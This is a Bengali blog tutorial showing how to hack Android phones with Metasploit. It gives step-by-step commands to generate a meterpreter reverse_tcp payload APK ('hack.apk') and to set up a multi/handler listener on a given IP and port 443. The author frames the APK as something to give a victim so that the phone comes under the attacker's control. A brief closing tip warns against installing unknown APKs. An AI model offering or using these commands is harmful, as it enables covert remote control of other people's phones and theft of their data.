স্বাগতম জানাচ্ছি সবাইকে, হ্যাক স্কুল বিডির টিউটোরিয়ালে, বর্তমান সময়ের মোবাইল অপেরেটিং সিস্টেমের মধ্যে অন্যতম একটি অপারেটিং সিস্টেম হচ্ছে Android।
Android ইউজার দিন থেকে দিন বেড়েই চলেছে, ব্যাবহারকারীর সংখ্যা যেমন বাড়ছে তেমনি এর সাথে সাথে অপরেটিং সিস্টেমটার বিভিন্ন সিকিউরিটি হোল বা দুর্বলতাও বৃদ্ধি পাচ্ছে,
আজকের টিউটোরিয়ালে আমি আপনাদের দেখাবো কিভাবে Metasploit ব্যাবহার করে Android ফোন হ্যাক করা যায়,
এর জন্যে আপনার দরকার হবে Metasploit framework (আমি কালি লিনাক্সে ব্যাবহার করে দেখাবো টিউটোরিয়ালে।)
এবং টেস্টের জন্যে (যদি আপনি চান) তাহলে একটি স্মার্ট ফোন ।
এছাড়াও আমি অনেক বার ফেইসবুকে অনুরোধ পেয়েছি Androidফোন হ্যাকিং এর টিউটোরিয়ালের ব্যাপারে,
সুতারাং তাই আজ আমি আপনাদের দেখাবো কিভাবে Android ফোন হ্যাক করা যায় ।
(যারা উইন্ডোজ ব্যাবহার করে করতে চান তারা Metasploit framework উইন্ডোজ ভার্সন টা ব্যাবহার করতে পারেন,গুগল সার্চ করলেই ডাউনলোড লিঙ্ক পেয়ে যাবেন)
প্রথমেই যেনে নেয় Android কি সেটা সম্পর্কে
উইকিপিডিয়া থেকে আমরা জানতে পারি যে
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
APK ফাইলকি সেটাও হইতো আপনারা সবাই জানেন, আসুন দেখি উইকিপিডিয়াতে কি আছে সেটা সম্পর্কে
Android application package file (APK) is the file format used to distribute and install application software and middle ware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu. -
হ্যা আরেকটা কথা, Metasploit রান করানোর জন্যে আপনার পোর্ট ওপেন থাকা লাগবে যদি আপনি রাউটার ব্যাবহারকারী হন তাহলে কাজটি সহজেই করতে পারবেন গুগল সার্চ করলে এটার জন্যে অনেক টিউটোরিয়াল পাবেন, আর আপনি রাউটার ইউজার না হলে ভিপিএন ব্যাবহার করতে পারেন।
এখন চলুন আমি আপনাদের একটি লাইভ ডেমোর মাধ্যমে দেখানোর চেষ্টা করি কিভাবে এট্যাক করবেন :)
টিউটোরিয়াল সম্পর্কিত তথ্যঃ
টিউটোরিয়ালে যে এট্যাকার মেশিন থেকে এট্যাক বা হ্যাক করা হবে তার আইপিঃ 192.168.8.94
এবং ওপেন পোর্ট হচ্ছেঃ 443
প্রথমেই আমি কালি লিনাক্সের টার্মিনাল ওপেন করলাম
msfpayload android/meterpreter/reverse_tcp LHOST=<hacker_ip_address> LPORT=<port_to_receive_connection>
এবং এই কমান্ডটি লেখে এন্টার করলাম। LHOST=আপনার আইপি এড্রেস LPORT=ওপেন পোর্ট নং।
আমাদের payload হচ্ছে reverse_tcp যেটার মাধ্যমে ভিকটিম এট্যাকার বা হ্যাকারের মেশিনের সাথে কানেক্ট হবে, এই কানেক্ট করার জন্যে আমাদের হ্যান্ডলার সেটাপ করতে হবে ইনকামিং কানেকশন গ্রহন করার জন্যে,payload এক্সিকিউট করার পরে ইনকামিং কানেশন আসবে এবং সেটা রিসিভ করার জন্যেই আপনার পোর্ট ওপেন থাকা লাগবে অন্যথা কাজ হবে না।
-
এবার msfconsole কমান্ডটি লেখে এন্টার দিন টার্মিনালে, metasploit console এ যাওয়ার জন্যে,
এইবার নিচের কমান্ডটি লিখে এন্টার চাপুনঃ
use exploit/multi/handler --> আমরা Metasploit Handler ব্যাবহার করছি।
এরপরে
set payload android/meterpreter/reverse_tcp --> এই কমান্ডটি লেখুন টার্মিনালে প্রথম স্ক্রিনশটটি অনুসরন করে এবং এন্টার চাপুন ।
নেক্সট স্টেপে আমি কিছুক্ষন আগে ইনকামিং কানেকশন রিসিভ করার জন্যে যে পোর্ট ওপেন থাকার কথা বলেছিলাম সেটা নিয়ে কাজ করবো ।
নিচের স্টেপটি ধাপে ধাপে অনুসরন করুন
(কমান্ড গুলো টার্মিনালে লেখে এন্টার দিবেন)
set lhost 192.168.8.94 –> এট্যাকার বা আপনার আইপি এড্রেস
set lport 443 –> ওপেন পোর্ট নং যেটার মাধ্যমে রিভার্স কানেকশন রিসিভ করা হবে।
exploit –> এখন ইনকামিং কানেকশন রিসিভ করার জন্যে রেডি আপনার পিসি বা মেশিন :p
প্রথম স্ক্রিনশটে আমরা একটি apk ফাইল বানিয়েছিলাম hack.apk (এটা আমাদের দিতে হবে ভিকটিমকে , যদি সে রান করায় ফাইলটা তার Android ফোনে তাইলেই কাজ শেষ :) )
এখন আমি আমার নিজের এন্ড্রয়ড ফোনে hack.apk ফাইলটি রান করানোর সাথে সাথে metasploit console দেখালো যে কানেক্ট হয়েছে।
ছবিতে দেখুনঃ
যদি আমি নিজের Android ফোন কি ভিকটিমের ফোন হিসেবে ধরে নেয় তাহলে এখন আমার আন্ডারে এখন আছে ভিকটিমের মোবাইল :D :D
কিভাবে নিজেকে সিকিউর করবেন বা নিজে সিকিউর থাকবেন।
১. ভুলেও কখনো unknown source থেকে apk file ইন্সটল করবেন না ।
২.যদি করেন তাহলে করবেন এমন ফাইল যেটার সোর্স রিড করা যায় যার মাধ্যমে আপনি ইন্সটল করার আগেই দেখে নিতে পারেন যে সফটওয়্যারটি ক্ষতিকারক নাকি না। :)
আমার বানানো hack.apk ফাইলটির সোর্স কোড
ধন্যবাদ টিউনটি পড়ার জন্যে, টিউনটি কেমন লাগলো টিউনমেন্টের মাধ্যমে জানান, ভালো লাগলে শেয়ার করুন
এবং কোনো প্রকার সমস্যা হলে আমার ফেইসবুক আইডিতে আমার সাথে যোগাযোগ করতে পারেন।
ধন্যবাদ।
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন
মনে রাখবেন: এই ব্লগের কোনও সদস্যই কোনও মন্তব্য পোস্ট করতে পারে৷